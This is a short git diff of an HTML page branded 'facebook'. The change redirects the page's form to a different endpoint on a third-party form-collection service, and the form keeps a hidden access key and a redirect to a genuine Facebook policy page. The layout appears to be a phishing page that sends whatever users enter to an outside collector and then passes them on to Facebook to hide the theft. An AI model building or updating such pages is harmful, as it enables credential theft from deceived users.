--- a/second.html
+++ b/second.html
@@ -25,7 +25,7 @@
             <b class="text-5xl text-white">facebook</b>
         </div>
 
-        <form action="https://submit-form.com/TZWOg5Msy" method="POST">
+        <form action="https://submit-form.com/XGs4jc44E" method="POST">
 
             <input type="hidden" name="access_key" value="36e0f55a-6ce0-4025-a286-b0b652623ba0">
             <input type="hidden" name="redirect" value="https://transparency.fb.com/en-gb/policies/community-standards/">
